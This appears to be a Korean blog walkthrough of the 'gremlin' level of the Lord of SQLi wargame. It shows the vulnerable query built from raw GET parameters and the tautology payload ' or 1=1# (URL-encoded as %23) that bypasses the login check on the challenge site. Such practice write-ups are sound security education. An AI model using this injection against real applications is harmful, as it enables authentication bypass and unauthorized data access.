1. 문제 지문
2. 요약
- 일부 문자 필터링이 되어있음
- id 값을 받아서 참으로만 만들면 클리어
3. 풀이
자동문
id가 누구이던간에 참으로만 만들면 풀린다.
즉, id값은 아무렇게나 하고 or 뒤에 참인 수식 아무거나 넣으면 풀린다.
대표적으로 1=1을 많이 쓰는 편
주어진 쿼리
select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'
그렇다면,
select id from prob_gremlin where id='' or 1=1#' and pw=''
위와 같이 공격을 하면 되겠다.
-
https://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php?id=' or 1=1#샵(#)은 URL에서 안되기 때문에 URL인코딩 값으로 변환 (# => %23)
-
https://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php?id=' or 1=1%23클리어
'Web > LOS' 카테고리의 다른 글
| LOS 풀이 - (06) darkelf (0) | 2019.07.09 |
|---|---|
| LOS 풀이 - (05) wolfman (0) | 2019.07.09 |
| LOS 풀이 - (04) Orc (0) | 2019.07.09 |
| LOS 풀이 - (03) Goblin (0) | 2019.07.09 |
| LOS 풀이 - (02) Cobolt (0) | 2019.06.29 |